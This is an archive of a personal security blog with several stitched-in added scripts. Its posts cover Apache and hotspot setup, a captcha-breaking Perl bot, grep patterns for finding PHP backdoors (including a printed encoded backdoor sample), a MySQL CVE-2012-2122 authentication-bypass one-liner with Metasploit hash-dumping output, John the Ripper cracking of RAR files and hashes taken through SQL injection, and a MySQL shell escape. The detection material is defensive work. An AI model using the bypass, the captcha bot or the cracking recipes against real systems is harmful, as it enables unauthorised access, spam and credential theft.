Running Multiple Ports on Apache

June 30, 2012

In this tutorial I will share how to run Apache on multiple ports. By default Apache listens on port 80, but it can also listen on another port such as 8080. Separating ports is useful for several reasons, among them security, or because a different web application runs on each port. Here are the steps to configure Apache to listen on multiple ports on my Slackware machine:

1. Edit the file /etc/httpd/httpd.conf

root@th3w1tch:~# nano /etc/httpd/httpd.conf

Add the additional port, like this:

#Listen 12.34.56.78:80
Listen 80
Listen 8081

2. Add a virtual host rule for the additional port:

NameVirtualHost localhost:80
NameVirtualHost localhost:8081

<VirtualHost localhost:80>
    ServerName localhost
    DocumentRoot "/srv/httpd/htdocs"
</VirtualHost>

<VirtualHost localhost:8081>
    ServerName localhostx
    DocumentRoot "/srv/httpd/cgi-bin/project"
    <Directory "/srv/httpd/cgi-bin/project">
        AllowOverride None
        Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
        AddHandler cgi-script .cgi
        Order allow,deny
        Allow from all
    </Directory>
    <IfModule dir_module>
        DirectoryIndex index.cgi
    </IfModule>
</VirtualHost>

Here I use cgi-bin (Perl) to serve port 8081 as an example.

After the above configuration, restart Apache and try to access localhost:8081.
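As an added check, not part of the original post: a small shell audit of an httpd.conf in the layout shown above, reporting for each Listen port whether a VirtualHost serves it and whether that vhost turns on ExecCGI, so the exposed surface per port is explicit. It assumes the single-file config style used here and a POSIX awk; the sample config it writes is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): audit an httpd.conf of the shape
# shown above.  For every Listen port print whether a <VirtualHost> serves it and
# whether that vhost enables ExecCGI anywhere inside it.
# Assumes the single-file layout the post uses and a POSIX awk.

# Print "port vhost=yes|no execcgi=yes|no" for every Listen directive.
audit_listen_ports() {
    awk '
        { sub(/^[[:space:]]+/, "") }              # strip leading space
        /^#/ { next }                             # ignore comments
        /^Listen[[:space:]]/ { p = $2; sub(/.*:/, "", p); ports[++n] = p; next }
        /^<VirtualHost[[:space:]]/ {
            cur = $2; sub(/>.*/, "", cur); sub(/.*:/, "", cur)
            if (cur == "*" || cur == "") cur = "any"   # <VirtualHost *> serves all ports
            has[cur] = 1; next
        }
        /^<\/VirtualHost>/ { cur = ""; next }
        cur != "" && /^Options[[:space:]]/ && /ExecCGI/ && !/-ExecCGI/ { cgi[cur] = 1 }
        END {
            for (i = 1; i <= n; i++) {
                p = ports[i]
                v = ((p in has) || ("any" in has)) ? "yes" : "no"
                c = ((p in cgi) || ("any" in cgi)) ? "yes" : "no"
                print p, "vhost=" v, "execcgi=" c
            }
        }
    ' "$1"
}

# Ports Apache would listen on without any VirtualHost serving them.
ports_without_vhost() {
    audit_listen_ports "$1" | awk '$2 == "vhost=no" { print $1 }'
}

# Constructed sample mirroring the post's config, plus a stray Listen 9090 with no vhost.
write_sample_conf() {
    cat > "$1" <<'EOF'
#Listen 12.34.56.78:80
Listen 80
Listen 8081
Listen 9090
NameVirtualHost localhost:80
<VirtualHost localhost:80>
ServerName localhost
DocumentRoot "/srv/httpd/htdocs"
</VirtualHost>
<VirtualHost localhost:8081>
ServerName localhostx
DocumentRoot "/srv/httpd/cgi-bin/project"
<Directory "/srv/httpd/cgi-bin/project">
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
</Directory>
</VirtualHost>
EOF
}
```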

Captcha Broke Cracking

June 23, 2012

This time I will discuss how to crack a captcha. Everyone assumes that when a site is protected by a captcha, spammers cannot get through it, but that is a big mistake: when someone builds a sloppy captcha, it is easily broken.

What is CAPTCHA?
A captcha is generally an image containing a code, intended so that a human can read it while a computer will have difficulty reading the code in the image. This way only humans can continue the process, while computers/robots will fail.

How to do it?
OCR (Optical Character Recognition) is a technology for converting images into text. OCR is usually used to convert image files of scanned documents into text files for digital processing.
The program I use is GNU OCR (gocr) on my Slackware machine; it can be downloaded here.

OK, let's crack it.
Example captcha image:

root@th3w1tch:#gocr captcha.png
B2LXRWP

Now the code for the robot:

#!/usr/bin/perl
use strict;
use warnings;

# Fetch the captcha image, keeping the session cookie so the answer is posted against the same session
system("wget --cookies=on --load-cookies=xxcookie --keep-session-cookies --save-cookies=xxcookie http://www.example.com/captcha/image.php -O captcha.png");
# Run OCR on the image and store the recognised text
system("gocr captcha.png > cap.txt");
open(my $fh, '<', 'cap.txt') or die "Cannot open cap.txt: $!";
my $x;
while (<$fh>) {
    chomp;
    my $crack = $_;
    $x = "curl -X POST --data 'answer=$crack&submit=true' --referer http://www.example.com/captcha/image.php -b xxcookie http://www.example.com/captcha/image.php";
}
close($fh);
system($x) if defined $x;
#coding by th3_w1tch
#th3_w1tch@meh.or.id

Feel free to edit it according to your needs.
Thanks

Finding Vulnerabilities & Backdoor PHP Shell Script on a Server

June 21, 2012

Grep is a powerful command-line tool in Unix and Linux for searching data sets for lines that match a regular expression. As a bit of history, the utility was written by Ken Thompson on March 3, 1973 for Unix.
Here is a sample of common usage of the tool: searching for the text string pBot in my PHP file bot.php:

grep pbot bot.php

Alright, let's proceed to the objective of this article, which is to find common vulnerabilities, backdoor shells and other malicious files using the grep command. For this writeup I'm using grep version 2.9, so if you are using an older version of GNU grep (below 2.5.4), some of the commands in this article may not work. To determine the version of grep you can just type grep -V or grep --version in your terminal. For the other commands and arguments that can be appended to this command-line kung fu, you can also type grep --help for more information.

Common Usage for Finding Vulnerabilities

The very reason why most web applications can be easily hacked or pwned is insecure code and functions that can be exploited. Take for example command injection, also known as remote code execution in terms of web exploitation: it becomes possible when a website accepts added strings of characters or arguments and uses those inputs as arguments for executing a command on the web server. Because most vulnerable web applications use the shell_exec function, we can use grep to search for shell_exec in our /var/www directory to check for PHP files that may be vulnerable to RCE or command injection. Here is the command:

grep -Rn "shell_exec *(" /var/www

In the image above, we can see that it displays the path of the vulnerable script and the line number of the function call.
Another example: the include, require, include_once and require_once functions are common PHP functions found in scripts vulnerable to LFI (Local File Inclusion), a kind of vulnerability that allows an attacker to inject directory traversal characters on a certain website.
Again, we can grep for these functions to find possibly vulnerable scripts on our web server:

grep -Rn "include *(" /var/www

grep -Rn "require *(" /var/www

grep -Rn "include_once *(" /var/www

grep -Rn "require_once *(" /var/www

There are other PHP functions out there that can also be used for finding other web vulnerabilities; just use Google for other functions.
Grepping for Backdoor Shells and other Malicious Files
Backdoors are used by web defacers and hackers to maintain access to the web server, which allows them to execute arbitrary commands, download files, edit files, and set up a back-connection. Most backdoor shells use the shell_exec function for command execution. And because most anti-viruses and rootkit scanners can detect backdoor shells, attackers use PHP encoders for evasion. But because functions like base64_decode and eval are used in this technique, they can't escape the wrath of grep. Here is a sample backdoor shell that has only upload and system-information functions, encoded using the Carbylamine PHP Encoder:

<?php
function KJnPCP($XZK)
{
    $XZK=gzinflate(base64_decode($XZK));
    for($i=0;$i<strlen($XZK);$i++)
    {
        $XZK[$i] = chr(ord($XZK[$i])-1);
    }
    return $XZK;
}
eval(KJnPCP("U1QEAm4gzkrXzCopSSvVVE3wcAuN0SjJTMvN1YjT0lJMS8ks
0FS2LSxOs1fWBwsnpFWmpaAp1FdWVFfW0le2NQAr1LLBZmhhZiHCyLTypF
zNktLirMKUktwkoDElaMqwmwHSizAEVdCG28GeGwA="));
?>

Aside from shell_exec, base64_decode, and eval; here are other functions used by PHP backdoor shells:

phpinfo
system
php_uname
chmod
fopen
fclose
readfile
edoced_46esab
passthru
Thus you could also easily grep for these functions:

grep -Rn "shell_exec *(" /var/www

grep -Rn "base64_decode *(" /var/www

grep -Rn "phpinfo *(" /var/www

grep -Rn "system *(" /var/www

grep -Rn "php_uname *(" /var/www

grep -Rn "chmod *(" /var/www

grep -Rn "fopen *(" /var/www

grep -Rn "fclose *(" /var/www

grep -Rn "readfile *(" /var/www

grep -Rn "edoced_46esab *(" /var/www

grep -Rn "eval *(" /var/www

grep -Rn "passthru *(" /var/www

In my recent analysis, some of these functions are used by IRC bots that have malicious functions like vulnerability scanners, automatic backdoor bots, DoS bots, udpflooder bots, etc.

Oh, and you might want to add the tcpflood and udpflood strings when grepping for malicious files too, because these are commonly used by IRC bots that have udpflood and tcpflood functions.

What you saw from the image above is a sample of a pBot which is a PHP IRC bot used by some attackers to initiate DDoS (Distributed Denial of Service) / DoS (Denial of Service) attacks.

We can also list all these common functions by using this command in your terminal:

grep -RPn "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(" /var/www
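The combined grep above will match plenty of legitimate code (every fopen() or include()), so a practical next step is to rank the hits. The following is an added example, not from the original article: it runs the same function list per file, counts how many distinct suspicious functions each file calls, and flags the eval()-plus-decoder combination seen in the Carbylamine sample above. It assumes GNU grep and a POSIX shell; the sample files it writes are constructed stubs, not real malware.

```shell
#!/bin/sh
# Added example, not from the original post: score PHP files under a web root by the
# suspicious functions the post greps for, and flag files that combine eval() with a
# decoder (base64_decode/gzinflate/str_rot13) the way the encoded backdoor sample does.
# Assumes GNU grep (-E/-o/-q) and a POSIX shell.

SUSPECT='(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\('
DECODER='(base64_decode|gzinflate|gzuncompress|str_rot13) *\('

# Number of *distinct* suspicious functions called in a file (0 when none).
distinct_suspects() {
    grep -oE "$SUSPECT" "$1" 2>/dev/null | sed 's/ *($//' | sort -u | wc -l | tr -d ' '
}

# high   = eval() fed by a decoder (the encoded-shell pattern)
# medium = three or more different suspicious functions in one file
# low    = anything else (a lone include() or fopen() is not evidence by itself)
classify() {
    n=$(distinct_suspects "$1")
    if grep -qE 'eval *\(' "$1" && grep -qE "$DECODER" "$1"; then
        echo high
    elif [ "$n" -ge 3 ]; then
        echo medium
    else
        echo low
    fi
}

# Walk a web root: one "risk<TAB>count<TAB>path" line per PHP file, most calls first.
scan_webroot() {
    find "$1" -type f -name '*.php' | while read -r f; do
        printf '%s\t%s\t%s\n' "$(classify "$f")" "$(distinct_suspects "$f")" "$f"
    done | sort -t "$(printf '\t')" -k2,2nr
}

# Constructed sample web root (not real malware): benign page, encoded-eval stub, multi-function tool.
write_samples() {
    printf '<?php include("header.php"); echo "hello";\n' > "$1/index.php"
    printf '<?php eval(gzinflate(base64_decode($x)));\n' > "$1/bad.php"
    printf '<?php system($_GET["c"]); passthru($_GET["p"]); fopen("a","r"); fclose($h);\n' > "$1/tool.php"
}
```

Run scan_webroot /var/www to get the ranked list; anything classified high deserves a manual look first.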

Source here

MySQL Auth Bypass – CVE-2012-2122

June 21, 2012

Introduction

On Saturday afternoon Sergei Golubchik posted to the oss-sec mailing list about a recently patched security flaw (CVE-2012-2122) in the MySQL and MariaDB database servers. This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -128 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Exploitability

Although a wide range of MySQL and MariaDB versions use the vulnerable code, only some of these systems are exploitable. It boils down to whether the memcmp() routine returns values outside of the unsigned character range. According to Sergei, this is normally not the case, and the routine is normally compiled into the server as an inline function. The major exception is when GCC uses SSE optimization. Joshua Drake, a security researcher with Accuvant Labs, provided a sample application that can determine whether your system might be affected. On most systems, the results of this application match the MySQL package provided by the distribution, but the only way to be sure is to actually test it.

If you’d like to give this a try yourself, download Metasploit now for free.

So far, the following systems have been confirmed as vulnerable:

Ubuntu Linux 64-bit ( 10.04, 10.10, 11.04, 11.10, 12.04 ) ( via many including @michealc )
OpenSuSE 12.1 64-bit MySQL 5.5.23-log ( via @michealc )
Debian Unstable 64-bit 5.5.23-2 ( via @derickr )
Fedora ( via hexed and confirmed by Red Hat )
Arch Linux (unspecified version)

Feedback so far indicates the following platforms are NOT vulnerable:
Official builds from MySQL and MariaDB (including Windows)

Red Hat Enterprise Linux 4, 5, and 6 (confirmed by Red Hat)
CentOS using official RHEL rpms
Ubuntu Linux 32-bit (10.04, 11.10, 12.04, likely all)
Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
Debian Linux lenny 32-bit 5.0.51a-24+lenny5 ( via @matthewbloch )
Debian Linux lenny 64-bit 5.0.51a-24+lenny5 ( via @matthewbloch )
Debian Linux lenny 64-bit 5.1.51-1-log ( via @matthewbloch )
Debian Linux squeeze 64-bit 5.1.49-3-log ( via @matthewbloch )
Debian Linux squeeze 32-bit 5.1.61-0+squeeze1 ( via @matthewbloch )
Debian Linux squeeze 64-bit 5.1.61-0+squeeze1 ( via @matthewbloch )
Gentoo 64-bit 5.1.62-r1 ( via @twit4c )
SuSE 9.3 i586 MySQL 4.1.10a ( via @twit4c )
OpenIndiana oi_151a4 5.1.37 ( via @TamberP )
FreeBSD 64-bit (many versions)

Most Linux vendors should have a patch out soon, if not already.

Caveats and Defense

The first rule of securing MySQL is to not expose it to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network without any form of host-based access control.

If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the “bind-address” parameter to “127.0.0.1”. Restart the MySQL service to apply this setting.
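To make that my.cnf check repeatable across a fleet, here is an added example (not from the original post) that reads the bind-address inside the [mysqld] section, reports whether the daemon is restricted to loopback, and rewrites the file to 127.0.0.1 when it is not. It assumes a POSIX shell and awk and the usual INI-style my.cnf; the sample file it writes is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): inspect and fix the bind-address
# setting in a my.cnf, as the "Caveats and Defense" section recommends.
# Assumes a POSIX shell and awk; the file uses the normal [section] / key = value layout.

# Print the bind-address value found inside the [mysqld] section, or "unset".
mysql_bind_address() {
    awk '
        /^[[:space:]]*\[/ { insect = ($0 ~ /^[[:space:]]*\[mysqld\]/); next }
        insect && /^[[:space:]]*bind-address[[:space:]]*=/ {
            sub(/^[^=]*=[[:space:]]*/, "")      # drop "bind-address ="
            sub(/[[:space:]#].*$/, "")          # drop trailing comment
            val = $0
        }
        END { print (val == "" ? "unset" : val) }
    ' "$1"
}

# Exit 0 when the daemon is restricted to loopback, 1 otherwise (unset means all interfaces).
mysql_is_local_only() {
    case "$(mysql_bind_address "$1")" in
        127.0.0.1|::1|localhost) return 0 ;;
        *) return 1 ;;
    esac
}

# Rewrite the file so [mysqld] carries exactly one "bind-address = 127.0.0.1":
# existing bind-address lines in that section are dropped, and a [mysqld] section
# is appended if the file has none.
harden_bind_address() {
    tmp="$1.tmp.$$"
    awk '
        /^[[:space:]]*\[/ {
            insect = ($0 ~ /^[[:space:]]*\[mysqld\]/)
            print
            if (insect) { print "bind-address = 127.0.0.1"; done = 1 }
            next
        }
        insect && /^[[:space:]]*bind-address[[:space:]]*=/ { next }
        { print }
        END { if (!done) print "[mysqld]\nbind-address = 127.0.0.1" }
    ' "$1" > "$tmp" && mv "$tmp" "$1"
}

# Constructed sample: a server exposed on all interfaces.
write_sample_cnf() {
    printf '[client]\nport = 3306\n[mysqld]\nuser = mysql\nbind-address = 0.0.0.0 # exposed\nport = 3306\n' > "$1"
}
```

Restart MySQL after harden_bind_address for the new setting to take effect.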

Real-world Version Information

Pulling from the resources of a personal side project, I was able to derive some statistics about the real-world impact of this vulnerability. This project managed to find and gather the initial handshake for approximately 1.74 million MySQL servers across the internet at large. This statistic only includes MySQL instances that were on hosts publicly exposed to the internet and not bound to localhost.

Host Access Control

Of the 1.74 million MySQL servers identified, slightly more than 50% did not enforce host-based access controls ( 879,046 vs 863,920 ). The data was gathered by scanning randomly generated IPs across the entire addressable IPv4 unicast range, excluding networks known to be “dark” or where the network administrators had opted out of the survey.

MySQL Version Numbers

If we break down the list of accessible servers by version, we can see that the 5.0.x version series accounts for over 356,000 of the entire set, followed by 285,000 running a 5.1.x version, and 134,436 running a 5.5.x version. Doing the same type of analysis on the build flavor highlights how easy it is to identify Ubuntu (43,900), Debian (6,408), and Windows (98,665) MySQL services from the banners alone. Knowing that most Ubuntu 64-bit builds are likely to be vulnerable, the real question is how many of those nearly 44,000 Ubuntu systems are running 64-bit editions of the operating system.

Making the Most of It

If you are approaching this issue from the perspective of a penetration tester, this will be one of the most useful MySQL tricks for some time to come. One feature of Metasploit you should be familiar with is the mysql_hashdump module. This module uses a known username and password to access the master user table of a MySQL server and dump it into a locally-stored “loot” file. This can be easily cracked using a tool like John the Ripper, providing clear-text passwords that may provide further access.

This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.

$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run

[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes…
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Source here

Crack Winrar with our uncle JOHN

September 27, 2011

In this tutorial I will share how to crack a RAR archive file using JTR (John The Ripper).
OK, straight to the PoC:

root@th3w1tch:#john --wordlist=word.lst --rules --stdout | xargs -I jtr unrar e -pjtr xxx.rar

Please wait (have a smoke) until JTR finishes the job #lolz
Thanks

Password Cracking with John The Ripper (JTR)

April 21, 2011

Assalamu alaikum Wr. Wb

OK, on this occasion I will talk a little about Uncle John The Ripper (JTR), saviour of the world. xixixixi :p
JTR is an application for password cracking. It runs on *NIX and Windows platforms. If you don't have it yet, it can be downloaded from http://www.openwall.com/john/
This application is very popular; who doesn't know Uncle JOHN :D. It is a great help for someone who usually does SQL injection and the like, because the passwords found are usually hashed by the admin, especially when http://www.md5decrypter.co.uk cannot crack them. That is where JTR comes in:

OK, straight to the techniques:

1. MD5 Hash
- Example MD5 hashes:
21232f297a57a5a743894a0e4a801fc3
827ccb0eea8a706c4c34a16891f84e7b
To crack them, save the MD5 hashes into a file like this:

1:21232f297a57a5a743894a0e4a801fc3
2:827ccb0eea8a706c4c34a16891f84e7b

root@th3_w1tch:/pentest/passwords/jtr# ./john -format=raw-md5 pass.txt
12345 (2)
admin (1)
guesses: 2 time: 0:00:00:00 100.00% (2)

Using a wordlist

root@th3_w1tch:/pentest/passwords/jtr# ./john --wordlist=/data/dict.txt -format=raw-md5 pass.txt

Using a password character type:
alpha : letters
digit : digits
alnum : letters and digits
all : try all characters

root@th3_w1tch:/pentest/passwords/jtr#./john --incremental=alnum --format=raw-md5 pass.txt

2. MD4 Hash

root@th3_w1tch:/pentest/passwords/jtr# ./john -format=raw-md4 pass.txt

3. SHA1 Hash

root@th3_w1tch:/pentest/passwords/jtr# ./john -format=raw-sha1 pass.txt

4. Joomla MD5 Hash
This one is a bit different, because Joomla passwords use an algorithm like
md5([original password]+[salt]); the result looks like this: f9c63438a5fececf0d99355394024f3c:YpSmHvK6ut2306WsORjw3bKAmHKH4eT6
Example Joomla hash
f9c63438a5fececf0d99355394024f3c:YpSmHvK6ut2306WsORjw3bKAmHKH4eT6
How to crack:
Save the hash in a file like this

1:md5_gen(1)f9c63438a5fececf0d99355394024f3c$YpSmHvK6ut2306WsORjw3bKAmHKH4eT6

Note that when saving, the ":" is replaced by "$": md5$salt

root@th3_w1tch:/pentest/passwords/jtr#./john --subformat=md5_gen\(1\) pass.txt
Loaded 1 password hash ( md5_gen(1): md5($p.$s) (joomla) [md5-gen SSE2 16x4])
ddddda (1)
guesses: 1 time: 0:00:00:02 (3)

5. WordPress phpass Hash
Example hash
$P$937lj8T3rci18KkTykssJJWHrtsVtb/

How to crack:
Save the hash above in a file like this

1:$P$937lj8T3rci18KkTykssJJWHrtsVtb/

root@th3_w1tch:/pentest/passwords/jtr#./john --subformat=md5_gen\(17\) pass.txt
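The Joomla step above hinges on two details: the stored value is md5(password . salt), and John wants the "hash:salt" pair rewritten as md5_gen(1)hash$salt. This added example (not from the original post) does that conversion and checks a candidate password against raw-md5 and Joomla-style hashes, which is also how you would confirm a result John reports. It assumes a POSIX shell and GNU coreutils md5sum; the Joomla test pair is constructed, while the two raw-md5 hashes are the ones listed in step 1.

```shell
#!/bin/sh
# Added example (not from the original post): convert Joomla "md5:salt" hashes into
# the md5_gen(1) line format the post feeds to John, and verify a candidate password
# against raw-md5 and Joomla md5($p.$s) hashes.
# Assumes GNU coreutils md5sum and a POSIX shell.

# Hex MD5 of the argument, with no trailing newline folded into the digest.
md5_hex() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# "hash:salt" -> "N:md5_gen(1)hash$salt" (N is the line id John echoes back in its output).
joomla_to_john() {
    id=$1; line=$2
    hash=${line%%:*}; salt=${line#*:}
    printf '%s:md5_gen(1)%s$%s\n' "$id" "$hash" "$salt"
}

# Exit 0 when md5(candidate) equals the raw hash.   $1 = hash, $2 = candidate
verify_raw_md5() {
    [ "$(md5_hex "$2")" = "$1" ]
}

# Exit 0 when md5(candidate . salt) equals the Joomla hash.   $1 = "hash:salt", $2 = candidate
verify_joomla() {
    hash=${1%%:*}; salt=${1#*:}
    [ "$(md5_hex "$2$salt")" = "$hash" ]
}

# Build a Joomla-style "hash:salt" record for a known password (constructed test data).
make_joomla_record() {
    printf '%s:%s' "$(md5_hex "$1$2")" "$2"
}
```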

OK, that's all for now. If anything is unclear, please leave a comment :D. Hope this is useful.

Executing Shell Commands in MySQL

April 19, 2011

Assalamu Alaikum Wr.Wb

On Linux and BSD systems, MySQL allows us to execute shell commands such as ls -la, echo, and several others.
OK, first let's connect to MySQL:

mysql -u [username] -p [database]

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 206 to server version: 5.0.22

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.

mysql>

After connecting successfully, we will try executing a shell command from within MySQL:

mysql> \! ls -l

The result will look like this:

total 26700
drwxr-xr-x  3 root root     4096 2011-04-15 16:58 .
drwxr-xr-x  3 root root     4096 2011-04-16 20:51 ..
drwxrwxr-x 15 root root     4096 2011-04-05 02:24 anoopmenon-opencv-perl-b52785c
-rw-r--r--  1 root root 22379390 2011-04-05 01:34 anoopmenon-opencv-perl-b52785c.tar.gz
-rw-------  1 root root     1675 2011-02-13 01:53 backup-key
-rw-r--r--  1 root root      403 2011-02-13 01:53 backup-key.pub
-rw-r--r--  1 root root  4894720 2011-04-15 16:57 john.tgz
-rw-r--r--  1 root root     1531 2011-03-25 22:54 tutor

mysql> \! nano

mysql> \! vi

and several other commands.

Now let's try dropping straight into the system shell:

mysql> \! bash

and it will look like this:

bash-4.1#

OK, that's the end of the tutorial; hopefully it is useful for all of us.

Building a Hotspot + DHCP Server

March 12, 2011

Assalamu Alaikum Wr.Wb
In this tutorial I will try to build my own hotspot on Linux with my Slackware machine, since the need for wireless networking keeps growing. The hotspot I build is very simple because it does not use a user database.
For the hotspot application I use hostapd (available from slackbuilds.org) and dhcpd for the DHCP server.
OK, straight to it; prepare the tools and ingredients :D
1. Cappuccino coffee + Sampoerna. :D hahahahaha
2. First download the hostapd application here, then install it:

root@th3w1tch:~#wget http://hostap.epitest.fi/releases/hostapd-0.6.10.tar.gz

root@th3w1tch:~#wget http://slackbuilds.org/slackbuilds/13.1/network/hostapd.tar.gz

root@th3w1tch:~#tar -xzvf hostapd.tar.gz

root@th3w1tch:~#mv hostapd-0.6.10.tar.gz hostapd/

root@th3w1tch:~#cd hostapd/

root@th3w1tch:~/hostapd#./hostapd.Slackbuild

3. Configure hostapd
Edit the file /etc/hostapd/hostapd.conf. I use the following configuration; adjust it to your needs:

interface=wlan0
driver=nl80211
ssid=coconut
country_code=ID
hw_mode=g
channel=1
auth_algs=1
ignore_broadcast_ssid=0
wpa=3
wpa_passphrase=coconut123
wpa_pairwise=TKIP
rsn_pairwise=CCMP

4. Configure the DHCP server
Edit the file /etc/dhcpd.conf. I use the following configuration; adjust the DNS and IP addresses you use.

# dhcpd.conf
#
# Configuration file for ISC dhcpd (see 'man dhcpd.conf')
#
option domain-name-servers 8.8.8.8;
default-lease-time 600;
max-lease-time 7200;
ddns-update-style none; ddns-updates off;
subnet 192.168.0.0 netmask 255.255.255.0 {
        range 192.168.0.200 192.168.0.229;
        option subnet-mask 255.255.255.0;
        option broadcast-address 192.168.0.255;
        option routers 192.168.0.1;
}

4. Create a bash script to start and stop the hotspot service.

root@th3w1tch:~#nano /etc/rc.d/rc.hotspot

#!/bin/sh
IPTABLES=/usr/sbin/iptables
IFCONFIG=/sbin/ifconfig
DHCPD=/usr/sbin/dhcpd
HOSTAPD=/usr/sbin/hostapd

intwlan0=wlan0      # wireless interface the hotspot is served on
internet=ppp0       # interface connected to the internet
ip=192.168.0.1      # gateway address handed out by dhcpd

case "$1" in
start)
        echo "Starting $intwlan0 at ip address $ip"
        echo 0 > /proc/sys/net/ipv4/ip_forward
        killall hostapd
        killall dhcpd
        # NAT the hotspot clients out through the internet interface
        $IPTABLES -t nat -A POSTROUTING -o $internet -j MASQUERADE
        $IPTABLES -A FORWARD -i $internet -o $intwlan0 -m state \
                --state RELATED,ESTABLISHED -j ACCEPT
        $IPTABLES -A FORWARD -i $intwlan0 -o $internet -j ACCEPT
        echo 1 > /proc/sys/net/ipv4/ip_forward
        $IFCONFIG $intwlan0 down
        $IFCONFIG $intwlan0 up
        $IFCONFIG $intwlan0 $ip
        if [ ! -f /var/state/dhcp/dhcpd.leases ]; then
                touch /var/state/dhcp/dhcpd.leases
        fi
        $DHCPD -cf /etc/dhcpd.conf $intwlan0
        $HOSTAPD -B -P /var/run/hostapd.pid /etc/hostapd/hostapd.conf
        ;;
stop)
        echo "Stopping $intwlan0"
        kill -INT $(cat /var/run/hostapd.pid)
        kill -INT $(cat /var/run/dhcpd.pid)
        # flush the forwarding and NAT rules added at start
        $IPTABLES -F
        $IPTABLES -Z
        $IPTABLES -X
        $IPTABLES -t nat -F
        $IPTABLES -t nat -X
        $IPTABLES -t nat -Z
        ;;
*)
        echo "Usage: $0 {start|stop}"
        exit 1
        ;;
esac

Look at the code above and adjust the interface that is connected to the internet; I use the ppp0 interface.

5. Change the permissions of the file we created, then run it:

root@th3w1tch:~#chmod +x /etc/rc.d/rc.hotspot

root@th3w1tch:~#/etc/rc.d/rc.hotspot start

6. Scan for the wireless network from the client computer and enjoy your hotspot :D

-------------------------------------------end---------------------------------
Notes:
- If you want the hotspot active every time the computer boots,
edit the file /etc/rc.d/rc.local and add these lines:

if [ -x /etc/rc.d/rc.hotspot ]; then
  /etc/rc.d/rc.hotspot start
fi

- If you want to build a hotspot login page backed by a user database, play with iptables:
Redirect all packets on port 80 to the local web server

root@th3w1tch:~#iptables -t nat -A PREROUTING -s 192.168.0.0/24 -p tcp -m tcp --dport 80 -j REDIRECT --to-port 80

On the web server, place a login page for the WLAN users. After a user logs in, INSERT rules into the FORWARD and PREROUTING chains. This can be done by executing PHP or Perl in the web server's shell environment. For example, create a shell script like the following to open an IP so it can reach the internet:

#!/bin/bash
# file buka.sh
iptables -A FORWARD -s $1 -i wlan0 -o ppp0 -d 0.0.0.0/0 -j ACCEPT
iptables -A FORWARD -s 0.0.0.0/0 -i ppp0 -o wlan0 -d $1 -j ACCEPT
iptables -t nat -I PREROUTING -s $1 -p tcp -m tcp --dport 80 -d 0/0 -j RETURN

And to close an IP so it can no longer reach the internet, create a shell script like this:

#!/bin/bash
# file tutup.sh
# remove the two FORWARD rules added by buka.sh, then put the client back behind the portal redirect
iptables -D FORWARD -s $1 -i wlan0 -o ppp0 -d 0.0.0.0/0 -j ACCEPT
iptables -D FORWARD -s 0.0.0.0/0 -i ppp0 -o wlan0 -d $1 -j ACCEPT
iptables -t nat -D PREROUTING -s $1 -p tcp -m tcp --dport 80 -d 0/0 -j RETURN

Make sure the web server's main page is the login script for the hotspot users.
Example use of buka.sh and tutup.sh: say a hotspot user is given the IP 192.168.0.202; then after the user logs in, the following command is executed automatically:
/path/buka.sh 192.168.0.202

When finished and you want to close the user's connection, execute tutup.sh:
/path/tutup.sh 192.168.0.202
